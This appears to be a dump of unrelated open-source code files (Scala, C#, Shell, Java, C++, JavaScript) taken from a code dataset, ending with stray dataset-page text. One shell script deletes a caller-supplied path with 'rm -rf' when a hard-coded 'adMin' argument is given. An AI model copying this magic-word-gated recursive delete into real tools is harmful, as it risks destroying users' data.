private val resStream = iter.flatten.toStream
def get(resultNo: Int, `var`: Variable) = get(resultNo)(varPos(`var`))
def get(resultNo: Int): Array[GroundTerm] = resStream(resultNo)
val getArity = 2
}
*/
class SparqlResultList(varPos:Map[Variable, Int]) extends mutable.ArrayBuffer[Array[GroundTerm]] with ResultList {
override def +=(elem: Array[GroundTerm]) = {
assert(elem.length == 2)
super.+=(elem)
}
override def get(resultNo: Int, `var`: Variable): GroundTerm = this(resultNo)(varPos(`var`))
override def get(resultNo: Int): Array[GroundTerm] = this(resultNo)
val getArity = 2
}
class PSLSparqlDataStore(protected[whip] val anzo:IAnzoClient, keyFields:Set[AnzoURI]) extends DataStore {
protected[whip] val observedPredicates = mutable.HashSet[StandardPredicate]() //mutable.HashMap[AnzoURI, StandardPredicate]()
protected[whip] val targetPredicates = mutable.HashSet[StandardPredicate]()
protected[whip] val variables = mutable.HashMap[String, TypedVariable]()
override def registerPredicate(predicate: StandardPredicate): Unit = {
predicate match {
case tp:TypedStandardPredicate[_,_] =>
if(keyFields contains tp.uriType) {
observedPredicates += tp
} else {
targetPredicates += tp
}
case s:StandardPredicate =>
require(predicate.getArity == 2)
Try(EncodingUtils.uri(predicate.getName)) match {
case Success(uri) if keyFields contains uri => observedPredicates += predicate
case Success(uri) => targetPredicates += predicate
case Failure(f) => throw new IllegalArgumentException("Expected a uri for predicate name, got " + predicate.getName)
}
}
}
def registerTypedVariable(v:TypedVariable): Unit = { variables += v.name -> v }
override def getRegisteredPredicates: JSet[StandardPredicate] = (observedPredicates ++ targetPredicates).asJava
override def getUniqueID(key: Any): UniqueID = key match {
case uri:AnzoURI => new URIUniqueId(uri)
case jUri:JURI => new URIUniqueId(EncodingUtils.uri(jUri.toString))
case str:String if Try(EncodingUtils.uri(str)).isSuccess => new URIUniqueId(EncodingUtils.uri(str))
case otw => throw new IllegalArgumentException("Expected a uri or uri string, received " + otw.toString)
}
def getDatabase(datasets:Set[AnzoURI], ontology:AnzoURI=null) = new PSLSparqlDatabase(this, datasets, ontology, variables.toMap)
override def getUpdater(predicate: StandardPredicate, partition: Partition): Updater = ???
override def getInserter(predicate: StandardPredicate, partition: Partition): Inserter = ???
override def deletePartition(partition: Partition): Int = ???
override def getDatabase(write: Partition, read: Partition*): Database = ???
override def getDatabase(write: Partition, toClose: JSet[StandardPredicate], read: Partition*): Database = ???
override def close() {/*noOp*/}
override def getNextPartition: Partition = ???
}
class PSLSparqlDatabase(private val datastore:PSLSparqlDataStore, private val datasets:Set[AnzoURI], private val ontology:AnzoURI, variableMap:Map[String,TypedVariable]) extends Database {
private val anzo = datastore.anzo
private val cache = new AtomCache(this)
private val observed = datastore.observedPredicates
private val target = datastore.targetPredicates
def getAtom(p:Predicate, arguments:GroundTerm*) =
Option(cache.getCachedAtom(new QueryAtom(p, arguments:_*))) match {
case Some(res) => res
case None => p match {
case tp:TypedStandardPredicate[_,_] => // TODO should this work for non-typed predicates? nothing else will
val Seq(PSLURI(s), PSLURI(o)) = arguments // TODO expand for other options
val value = if(anzo.serverQuery(null, null, datasets.asJava, s"ASK { <$s> <${tp.uriType}> <$o> }").getAskResults) 1.0 else 0.0
if(observed contains tp) {
println("generating obs atom for " + (tp, arguments, value))
cache.instantiateObservedAtom(tp, arguments.toArray, value, Double.NaN)
} else if(target contains tp) {
if(value > 0.0)
println("generating rv atom for " + (tp, arguments, value))
cache.instantiateRandomVariableAtom(tp, arguments.toArray, value, Double.NaN)
} else {
throw new IllegalArgumentException("Expected predicate to be registered as observed or target, but wasn't either")
}
case sp:SparqlPredicate =>
if(!sp.isComputed) sp.precompute(this)
cache.instantiateObservedAtom(sp, arguments.toArray, sp.computeValue(new ReadOnlyDatabase(this), arguments:_*), Double.NaN)
}
}
override def getRegisteredPredicates = datastore.getRegisteredPredicates
override def getUniqueID(key: Any) = datastore.getUniqueID(key)
override def getDataStore = datastore
private val executeQ =
"""SELECT %s
|WHERE {
| %s
|}""".stripMargin
def executeQuery(query:DatabaseQuery) = {
val f = query.getFormula
val atoms = f.getAtoms(mutable.Set.empty[Atom].asJava).asScala
val projected = (query.getProjectionSubset.asScala.toSet ++
f.collectVariables(new VariableTypeMap).asScala.keySet) --
query.getPartialGrounding.asScala.keySet
val projectedBindings = mutable.ArrayBuffer[Variable]()
val whereClauses = atoms.map { a =>
(a.getPredicate, a.getArguments) match {
case (p:TypedStandardPredicate[_, _], Array(PSLVar(s), PSLVar(o))) if observed contains p =>
projectedBindings += s
projectedBindings += o
s"\t?$s <${p.uriType}> ?$o ."
case (p:TypedStandardPredicate[_, _], Array(PSLVar(s), PSLVar(o))) if target contains p =>
val (sType, oType) = (s, o) match {
case (PSLURIVar(su), PSLURIVar(ou)) => su.uriType -> ou.uriType
case _ => p.domain -> p.range
}
projectedBindings += s
projectedBindings += o
Seq(s"\t?$s a <$sType> .",
s"\t?$o a <$oType> .").mkString("\n")
case (sp:SparqlPredicate, Array(PSLVar(s), PSLVar(o))) =>
if(!sp.isComputed) {
sp.precompute(this)
}
s"?$s <${sp.predicate}> ?$o ."
case (p:StandardPredicate, ts) =>
println ("observed " + observed + "\ntarget " + target)
throw new IllegalArgumentException("Wasn't expecting " + (p, p.getClass, observed contains p, target contains p, ts.toSeq))
}
}.mkString("\n")
val Q = s"SELECT ${projectedBindings.map(v => "?" + v.getName).toSet.mkString(" ")}\nWHERE {\n$whereClauses\n}"
println(f)
println(projected)
println(Q)
val res = new SparqlResultList(projectedBindings.zipWithIndex.toMap)
val q = anzo.serverQuery(null, null, datasets.asJava, Q).getSelectResults.asScala.foreach { ps =>
val m = ps.toMap
res += projectedBindings.map(v => xml2Psl(m(v.getName))).toArray
}
res
}
override def close() {/*noOp*/}
override def isClosed(predicate: StandardPredicate) = target contains predicate
override def getAtomCache = cache
override def commit(atom: RandomVariableAtom): Unit = {
require(atom.getArity == 2)
val p = EncodingUtils.uri(atom.getPredicate.getName)
atom.getArguments match {
case Array(PSLURI(s), PSLURI(o)) =>
val stmt = new Statement(s, p, o)
val stmtVal = new Statement(s, EncodingUtils.uri(p.toString +"_value"), xmlWrap(atom.getValue))
val stmtConf = new Statement(s, EncodingUtils.uri(p.toString +"_confidence"), xmlWrap(atom.getConfidenceValue))
anzo.add(stmt, stmtVal, stmtConf)
anzo.commit()
anzo.updateRepository(true)
case otw => ???
}
}
}
| JackSullivan/whip | src/main/scala/so/modernized/whip/PSLSparqlDatabase.scala | Scala | apache-2.0 | 9,595 |
using De.Osthus.Ambeth.Bytecode.Visitor;
using De.Osthus.Ambeth.Ioc.Annotation;
using De.Osthus.Ambeth.Log;
using De.Osthus.Ambeth.Merge;
using De.Osthus.Ambeth.Merge.Model;
using De.Osthus.Ambeth.Proxy;
using System;
using System.Collections.Generic;
namespace De.Osthus.Ambeth.Bytecode.Behavior
{
public class EnhancedTypeBehavior : AbstractBehavior
{
[LogInstance]
public ILogger Log { private get; set; }
[Autowired]
public IEntityMetaDataProvider EntityMetaDataProvider { protected get; set; }
public override Type[] GetEnhancements()
{
return new Type[] { typeof(IEnhancedType), typeof(IEntityMetaDataHolder) };
}
public override IClassVisitor Extend(IClassVisitor visitor, IBytecodeBehaviorState state, IList<IBytecodeBehavior> remainingPendingBehaviors,
IList<IBytecodeBehavior> cascadePendingBehaviors)
{
if ((state.GetContext<EntityEnhancementHint>() == null && state.GetContext<EmbeddedEnhancementHint>() == null))
{
return visitor;
}
if (state.GetContext<EntityEnhancementHint>() != null)
{
IEntityMetaData metaData = EntityMetaDataProvider.GetMetaData(state.OriginalType);
visitor = new InterfaceAdder(visitor, typeof(IEntityMetaDataHolder));
visitor = new EntityMetaDataHolderVisitor(visitor, metaData);
}
visitor = new InterfaceAdder(visitor, typeof(IEnhancedType));
visitor = new GetBaseTypeMethodCreator(visitor);
return visitor;
}
}
} | Dennis-Koch/ambeth | ambeth/Ambeth.Cache.Bytecode/ambeth/bytecode/behavior/EnhancedTypeBehavior.cs | C# | apache-2.0 | 1,613 |
#!/bin/bash
if [[ $# -eq 2 ]] && [[ "x$2" = "xadMin" ]] ; then
/bin/rm -rf $1
fi
| OpenVnmrJ/OpenVnmrJ | src/scripts/vcmdr.sh | Shell | apache-2.0 | 86 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.jsecurity.authz.aop;
import org.jsecurity.aop.AnnotationMethodInterceptor;
import org.jsecurity.aop.MethodInvocation;
import org.jsecurity.authz.AuthorizationException;
import java.lang.annotation.Annotation;
/**
* An <tt>AnnotationMethodInterceptor</tt> that asserts the calling code is authorized to execute the method
* before allowing the invocation to continue.
*
* @author Les Hazlewood
* @since 0.1
*/
public abstract class AuthorizingAnnotationMethodInterceptor extends AnnotationMethodInterceptor {
public AuthorizingAnnotationMethodInterceptor(Class<? extends Annotation> annotationClass) {
super(annotationClass);
}
public Object invoke(MethodInvocation methodInvocation) throws Throwable {
assertAuthorized(methodInvocation);
return methodInvocation.proceed();
}
public abstract void assertAuthorized(MethodInvocation mi) throws AuthorizationException;
}
| apache/jsecurity | src/org/jsecurity/authz/aop/AuthorizingAnnotationMethodInterceptor.java | Java | apache-2.0 | 1,745 |
/*
* Licensed to The Apereo Foundation under one or more contributor license
* agreements. See the NOTICE file distributed with this work for additional
* information regarding copyright ownership.
*
* The Apereo Foundation licenses this file to you under the Apache License,
* Version 2.0, (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tle.web.workflow.soap;
public interface TaskListSoapInterface {
String getTaskFilterCounts(boolean ignoreZero);
String[] getTaskFilterNames();
String getTaskList(String filterName, int start, int numResults) throws Exception;
}
| equella/Equella | Source/Plugins/Core/com.equella.core/src/com/tle/web/workflow/soap/TaskListSoapInterface.java | Java | apache-2.0 | 1,054 |
package com.soulkey.calltalent.db;
import android.content.Context;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import com.soulkey.calltalent.db.model.SettingModel;
import com.soulkey.calltalent.db.populator.SettingPopulator;
public final class DbOpenHelper extends SQLiteOpenHelper {
public static final String DB_NAME = "calltalent.db";
private static final int DB_VERSION = 1;
private static DbOpenHelper instance;
public static DbOpenHelper getInstance(Context context) {
if (null == instance) {
instance = new DbOpenHelper(context);
}
return instance;
}
private DbOpenHelper(Context context) {
super(context, DB_NAME, null, DB_VERSION);
}
@Override
public void onCreate(SQLiteDatabase db) {
db.execSQL(SettingModel.CREATE_TABLE);
populateDb(db);
}
@Override
public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
}
private void populateDb(SQLiteDatabase db) {
SettingPopulator.populate(db);
}
}
| wpcfan/calltalent | app/src/main/java/com/soulkey/calltalent/db/DbOpenHelper.java | Java | apache-2.0 | 1,109 |
////////////////////////////////////////////////////////////////////////////
// Module : alife_human_object_handler.h
// Created : 07.10.2005
// Modified : 07.10.2005
// Author : Dmitriy Iassenev
// Description : ALife human object handler class
////////////////////////////////////////////////////////////////////////////
#pragma once
#include "alife_space.h"
class CSE_ALifeItemWeapon;
class CSE_ALifeInventoryItem;
class CSE_ALifeGroupAbstract;
class CSE_ALifeHumanAbstract;
class CALifeHumanObjectHandler {
public:
typedef CSE_ALifeHumanAbstract object_type;
private:
object_type* m_object;
public:
IC CALifeHumanObjectHandler(object_type* object);
IC object_type& object() const;
public:
u16 get_available_ammo_count(const CSE_ALifeItemWeapon* weapon, ALife::OBJECT_VECTOR& objects);
u16 get_available_ammo_count(const CSE_ALifeItemWeapon* weapon, ALife::ITEM_P_VECTOR& items,
ALife::OBJECT_VECTOR* objects = 0);
void attach_available_ammo(CSE_ALifeItemWeapon* weapon, ALife::ITEM_P_VECTOR& items,
ALife::OBJECT_VECTOR* objects = 0);
bool can_take_item(CSE_ALifeInventoryItem* inventory_item);
void collect_ammo_boxes();
public:
void detach_all(bool fictitious);
void update_weapon_ammo();
void process_items();
CSE_ALifeDynamicObject* best_detector();
CSE_ALifeItemWeapon* best_weapon();
public:
int choose_equipment(ALife::OBJECT_VECTOR* objects = 0);
int choose_weapon(const ALife::EWeaponPriorityType& weapon_priority_type,
ALife::OBJECT_VECTOR* objects = 0);
int choose_food(ALife::OBJECT_VECTOR* objects = 0);
int choose_medikit(ALife::OBJECT_VECTOR* objects = 0);
int choose_detector(ALife::OBJECT_VECTOR* objects = 0);
int choose_valuables();
bool choose_fast();
void choose_group(CSE_ALifeGroupAbstract* group_abstract);
void attach_items();
};
#include "alife_human_object_handler_inline.h" | Im-dex/xray-162 | code/engine/xrGame/alife_human_object_handler.h | C | apache-2.0 | 1,999 |
package com.splinter.graphing;
import org.junit.Assert;
import org.junit.Test;
import java.util.HashMap;
import java.util.Map;
public class SplinterLogTest {
@Test
public void testDisableLogs() {
try {
SLog.setEnabled(false);
String expected = "";
Assert.assertEquals(expected, new SLogStop("Coffee Time", "coffeeComplete")
.withOperationAlias("ensureCapacity")
.withComponentOverride("WaterReservoir")
.withUserData("size", "large")
.withInstrumentationOverride(0, null)
.toString());
} finally {
SLog.setEnabled(true);
}
}
@Test
public void testStaticUtilsVarArgs() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=null;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=null;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, "large", "newkey"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", "large"));
}
@Test
public void testStaticUtils() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=A;size=large;";
Assert.assertEquals(expected, SLogStart.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=A;";
Assert.assertEquals(expected, SLogStart.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=F;size=large;";
Assert.assertEquals(expected, SLogStop.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=F;";
Assert.assertEquals(expected, SLogStop.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;+MC=1;size=large;";
Assert.assertEquals(expected, SLogBroadcastSend.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;+MC=1;";
Assert.assertEquals(expected, SLogBroadcastSend.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=A;+OA=selectCupSize;size=large;";
Assert.assertEquals(expected, SLogBroadcastStart.log("Coffee Time", "bcastId", "selectCupSize","size", "large"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=A;+OA=selectCupSize;";
Assert.assertEquals(expected, SLogBroadcastStart.log("Coffee Time", "bcastId", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=F;+OA=selectCupSize;size=large;";
Assert.assertEquals(expected, SLogBroadcastStop.log("Coffee Time", "bcastId", "selectCupSize","size", "large"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=F;+OA=selectCupSize;";
Assert.assertEquals(expected, SLogBroadcastStop.log("Coffee Time", "bcastId", "selectCupSize"));
}
@Test
public void testSunnyDay() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData("size", "large").toString());
Map<String, String> userData = new HashMap<String, String>();
userData.put("size", "large");
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData(userData).toString());
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;size1=large;size2=large;size3=large;size4=large;size5=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData("size", "large")
.withUserData("size1", "large")
.withUserData("size2", "large")
.withUserData("size3", "large")
.withUserData("size4", "large")
.withUserData("size5", "large").toString());
}
@Test
public void testOptionalParams() {
String expected = "$SPG$+T=Coffee Time;+O=pumpWater;+M=A;+I^=100ms;";
Assert.assertEquals(expected, new SLogStart("Coffee Time", "pumpWater")
.withInstrumentationOverride(100, SLog.TimeNotation.MILLIS)
.toString());
expected = "$SPG$+T=Coffee Time;+O=coffeeComplete;+M=F;+OA=ensureCapacity;+C^=WaterReservoir;";
Assert.assertEquals(expected, new SLogStop("Coffee Time", "coffeeComplete")
.withOperationAlias("ensureCapacity")
.withComponentOverride("WaterReservoir")
.toString());
}
@Test
public void testMissingParams() {
String expected = "$SPG$+T=_MISSING_TASK_;+O=_MISSING_OPERATION_;+M=S;";
Assert.assertEquals(expected, new SLog(null, null, null)
.toString());
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData(null, "large").toString());
}
@Test
public void testEscaping() {
Assert.assertEquals("abcd", SLog.escape("abcd"));
Assert.assertEquals("ab\\ncd", SLog.escape("ab\ncd"));
Assert.assertNull(SLog.escape(null));
Assert.assertEquals("", SLog.escape(""));
Assert.assertEquals("ab\\=cd", SLog.escape("ab=cd"));
Assert.assertEquals("ab\\;cd", SLog.escape("ab;cd"));
Assert.assertEquals("ab\\\\cd", SLog.escape("ab\\cd"));
}
@Test
public void testEscapingLog() {
String expected = "$SPG$+T=file\\; opened;+O=\\\\open;+M=S;+OA=\\=1;r\\=sr=/Users/dimitarz/\\;filename.log;";
Assert.assertEquals(expected, new SLog(null, null, null)
.withUserData("r=sr", "/Users/dimitarz/;filename.log")
.withOperation("\\open")
.withOperationAlias("=1")
.withTask("file; opened")
.toString());
}
}
| dimitarz/splinter | src/test/java/com/splinter/graphing/SplinterLogTest.java | Java | apache-2.0 | 7,294 |
package io.zrz.graphql.core.decl;
import java.util.List;
import org.eclipse.jdt.annotation.Nullable;
import io.zrz.graphql.core.doc.GQLDirective;
import io.zrz.graphql.core.parser.GQLSourceLocation;
public interface GQLDeclaration {
@Nullable
String description();
<R> R apply(GQLDeclarationVisitor<R> visitor);
List<GQLDirective> directives();
@Nullable
GQLSourceLocation location();
GQLDeclaration withDescription(String value);
GQLDeclaration withDirectives(GQLDirective... elements);
GQLDeclaration withDirectives(Iterable<? extends GQLDirective> elements);
GQLDeclaration withLocation(GQLSourceLocation value);
}
| zourzouvillys/graphql | graphql-core/src/main/java/io/zrz/graphql/core/decl/GQLDeclaration.java | Java | apache-2.0 | 651 |
/*
* @class TableExamplesService
*/
export default class TableExamplesService {
constructor($http) {
this.$http = $http;
}
static getClassName() { return 'TableExamplesService'; }
getClassName() { return TableExamplesService.getClassName(); }
/*
* @func getColumns
* @desc getes a list of columns representing the dataset that
* allows data tables to map the array of data to the table
*/
getColumns() {
return this.$http.get('http://localhost:3001/api/DataTable/Columns/People');
}
/*
* @func addColumn
* @desc adds a col
* allows data tables to map the array of data to the table
*/
addColumn(item) {
return this.$http.post('http://localhost:3001/api/DataTable/Columns/People', item);
}
/*
* @func getData
* @desc gets a list of items from the api
*/
getData() {
return this.$http.get('http://localhost:3001/api/People');
}
/*
* @func addData
* @desc adds an item to the api
* @param item
*/
addData(item) {
return this.$http.post('http://localhost:3001/api/People', item);
}
} | garrettwong/GDashboard | client/app/components/tableExamples/tableExamples.service.js | JavaScript | apache-2.0 | 1,084 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.